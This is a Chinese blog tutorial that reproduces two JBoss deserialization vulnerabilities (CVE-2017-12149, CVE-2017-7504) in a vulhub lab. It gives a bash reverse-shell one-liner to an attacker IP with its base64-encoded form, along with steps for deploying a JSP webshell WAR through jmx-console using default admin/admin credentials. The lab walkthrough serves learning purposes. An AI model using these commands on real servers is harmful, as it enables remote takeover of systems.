JBoss漏洞复现(保姆级教学)

已于 2024-05-05 09:43:20 修改
阅读量630 收藏 9
点赞数 12
分类专栏: 漏洞复现 文章标签: 网络安全 安全 网络 web安全
于 2024-04-25 12:32:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69043895/article/details/138185786
版权

1.环境搭建

靶机:Ubuntu 使用vulhub

还不懂的话参考:vulhub docker靶场搭建-CSDN博客

攻击机:kali 以及jboss利用工具

2.漏洞复现

2.1 CVE-2017-12149

漏洞原理:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

  1. 首先进入CVE-2017-12149的docker环境
cd jboss
ls
cd CVE-2017-12149
sudo docker-compose up -d
docker ps

访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞

此时打开 jboss利用工具,可以执行任意命令

这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码

Runtime.exec Payload Generater | AresX's Blog

bash -i >& /dev/tcp/192.168.10.45/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjQ1LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

在kali上开启监听:

在jboss上执行命令:

此时,kali上已经成功反弹shell

2.2CVE-2017-7504

1. 命令执行同上

2.可以上传war包木马

打开ip:8080

跳出弹窗,输入账号密码admin/admin成功登录

然后访问jmx-console

在自己服务器上部署一个webshell的war包

先写一个一句话木马jsp文件

然后再压缩成war文件

后,找到

void addURL(),在ParamValue填入我们远程的war包,点击invoke

nuc_ddddsj
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
Jboss漏洞利用小工具
11-06
JBoss是Red Hat公司开发的一款基于Java的企业应用服务器,它为构建、部署和管理企业应用程序提供了全面的平台。在过去的几年中,由于其广泛使用,JBoss也成为了黑客们的目标,存在一些安全漏洞,这些漏洞如果被...
jboss反序列化漏洞检测工具
02-15
jboss中间件的反序列化漏洞检测工具,可检测主机搭建的中间件并获得shell
jboss漏洞复现
Shanfenglan's blog
11-23 998
文章目录什么是jboss1. JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)原理利用2. JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)原理利用参考文章 什么是jboss java中间件,类似于weblogic,webSphere等。可以理解成是一个加强版的可以实现EJB的tomcat。它的内部集成了tomcat对servlet处理的功能,而且支持EJB,不过weblogic的性能几乎全优于它,基本可以用weblogic代替。 1. JBos
JBoss 漏洞复现
m0_43397796的博客
03-02 3974
JBoss 漏洞复现 CVE-2017-12149 JBoss AS 5.X/6.X反序列化漏洞 漏洞扫描 试验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDb56f-ab5c-4e92-840f-d59299ec273f 由于实验指导书上的ip有错误,所以先nmap扫描一下ipnmap -sn 10.1.1.0/24 发现4个ip 全端口扫描nmap -p- -sV -T4 10.1.1.254 10.1.1.135 10.1.1.9
jboss反序列化漏洞复现(CVE-2017-7504)
WY92139010的博客
07-31 567
jboss反序列化漏洞复现(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及复现 1、使用docker搭建漏洞环境...
jboss中间件漏洞复现
mingyqf的博客
02-15 1383
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
jboss漏洞getshell工具.zip
08-26
JBoss 漏洞与 GetShell 工具详解】 JBoss 是一款广泛使用的开源 Java 应用服务器,由 Red Hat 公司开发并维护。它提供了全面的企业应用程序部署和管理功能,支持多种 Java EE 规范。然而,由于其复杂性和广泛...
JBoss漏洞总结复现
1ance's blog
10-08 1796
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
漏洞复现JBoss漏洞总结
qq_45751902的博客
10-31 1445
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
jboss常见漏洞复现
可爱的我可爱的code
11-19 770
JBoss 5.x/6.x 反序列化漏洞( CVE-2017-12149 ) 验证: 访问/invoker/readonly,如果返回 500 ,说明页面存在,此页面存在反序列化漏洞。 利用工具:JavaDeserH2HC 步骤: 1.先编译 # 我们选择一个 Gadget : ReverseShellCommonsCollectionsHashMap ,编译并生成序列化数据 javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsColl
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1089
JBoss Application Server 相关漏洞复现
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 648
vulhub漏洞复现-jboss反序列化漏洞
Jboss反序列化漏洞复现与原理
LJH1999ZN的博客
03-29 4905
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞,CVE-2017-7504 漏洞存在/jbossmq-httpi
JBoss中间件漏洞汇总
热门推荐
混子
11-18 1万+
目录 一、JBoss是什么? 二、安装环境 1. Jdk 2. 下载JBoos4、6,并进行配置 三、 反序列漏洞 1. HttpInvoker 组件(CVE-2017-12149) 2. JMXInvokerServlet组件(CVE-2015-7501) 3. JBossMQ(CVE-2017-7504) 4.EJBInvokerServlet组件(CVE-2013-4810) 四、 War后门文件部署 1. admin-cosole(爆红接着传) 2. JMX-console.
JBOSS远程代码执行漏洞
Java web 开发专栏
01-09 842
JBOSS默认配置会有一个后台漏洞漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台,如下图下拉找到如下图所示点击flavor=URL,type=DeploymentScanner进入在输入框中写入war压缩
Tomcat后台弱口令漏洞及war码制作
weixin_45439698的博客
04-29 375
重点来了:那儿只能上传文件后缀为.war,那么它是什么呢?你可以理解为就是一个包,然后它里面包含一个xx.jsp的木马,那么怎么制作它呢? 1.先找到一个jsp的大马,然后放到文本文档里,然后用解压软件解压为rar的文件,再更改一下后缀为war即可。 还有一种方式,利用cmd命令行来做,具体参考(http://admin-yuku.lofter.com/post/1cbd1826_4383805)...
tomcat weblogic jboss 漏洞
最新发布
12-16
过去,Jboss也存在过一些漏洞,比如JMX控制台未授权访问漏洞和远程代码执行漏洞。这些漏洞可能会被利用来执行恶意操作和窃取数据。 为了防止这些漏洞对系统造成危害,用户应该及时安装官方发布的补丁和更新,加强...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nuc_ddddsj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值